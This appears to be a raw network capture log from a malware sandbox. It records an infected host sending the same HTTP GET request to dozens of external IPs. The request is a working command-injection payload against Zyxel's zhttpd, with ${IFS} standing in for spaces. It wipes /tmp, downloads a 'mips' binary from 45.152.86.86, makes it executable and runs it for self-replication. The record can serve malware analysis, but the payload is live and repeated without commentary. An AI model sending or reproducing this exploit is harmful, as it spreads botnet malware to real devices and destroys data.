                              Mar 31, 2024 08:41:25.828738928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4264192.168.2.134147051.67.19.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828793049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4265192.168.2.1347308124.205.136.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828830004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4266192.168.2.13332785.64.71.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828880072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4267192.168.2.1354940154.88.31.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828933001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4268192.168.2.1345364169.166.190.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.828969002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4269192.168.2.1336170152.25.92.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829016924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4270192.168.2.1345848175.45.55.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829051971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4271192.168.2.135432487.70.230.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829099894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4272192.168.2.1348092162.156.19.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829145908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4273192.168.2.1357180213.127.198.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829190969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4274192.168.2.1344420148.148.86.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829235077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4275192.168.2.1334146205.162.243.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829267025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4276192.168.2.134015878.142.248.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829297066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4277192.168.2.1356502140.215.155.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829353094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4278192.168.2.134799032.17.252.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829390049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4279192.168.2.1353978189.157.216.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829444885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4280192.168.2.1349424196.116.109.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829473972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4281192.168.2.135260037.100.149.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829504013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4282192.168.2.134645639.196.91.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829541922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4283192.168.2.135161299.139.92.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829595089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4284192.168.2.135448892.30.115.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829634905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4285192.168.2.1346194138.98.10.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829660892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4286192.168.2.1348510170.45.216.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829691887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4287192.168.2.1346688100.210.134.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829735994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4288192.168.2.134061661.220.219.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829791069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4289192.168.2.1339542144.120.8.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829807997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4290192.168.2.134788012.78.169.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829874039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4291192.168.2.135821459.30.164.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829921961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4292192.168.2.1355830219.102.123.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829960108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4293192.168.2.1345150171.77.206.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.829978943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4294192.168.2.1337548153.32.145.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830010891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4295192.168.2.133331877.208.131.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830064058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4296192.168.2.134719293.20.158.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830113888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4297192.168.2.1339858193.70.180.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830151081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4298192.168.2.133318247.171.127.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830202103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4299192.168.2.136034031.85.22.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830256939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4300192.168.2.134674481.35.52.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830280066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4301192.168.2.136098664.142.249.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830343008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4302192.168.2.1333796169.182.207.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830372095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4303192.168.2.1359260221.138.2.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830410004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4304192.168.2.1342170101.90.134.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830446959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4305192.168.2.135062834.51.135.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830499887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4306192.168.2.133990897.150.54.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830535889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4307192.168.2.1359102204.249.84.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830569983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4308192.168.2.135285447.25.104.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830620050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4309192.168.2.133876419.126.240.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830650091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4310192.168.2.1358932122.234.178.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830698013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4311192.168.2.1336640140.135.118.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830748081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4312192.168.2.1341744186.37.234.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830780983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4313192.168.2.135986672.227.239.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830833912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4314192.168.2.1337810180.14.172.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830862999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4315192.168.2.135036479.84.223.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830893993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4316192.168.2.1350834220.172.241.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830949068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4317192.168.2.1357644131.59.27.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.830976963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4318192.168.2.1355466200.96.110.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831001997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4319192.168.2.135521858.143.181.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831049919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4320192.168.2.133942835.234.40.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831078053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4321192.168.2.1352524204.161.144.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831126928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4322192.168.2.133350225.114.51.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831154108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4323192.168.2.133836277.56.34.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831198931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4324192.168.2.1344390217.37.168.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831248999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4325192.168.2.1350632172.105.248.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831262112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4326192.168.2.135474648.25.46.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831357002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4327192.168.2.1346090177.140.200.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831363916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4328192.168.2.133810085.66.193.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831379890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4329192.168.2.1355616217.123.234.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831413984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4330192.168.2.1340650110.135.13.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831451893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4331192.168.2.134209452.250.42.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.831518888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4332192.168.2.134954446.40.222.198443
                              TimestampBytes transferredDirectionData
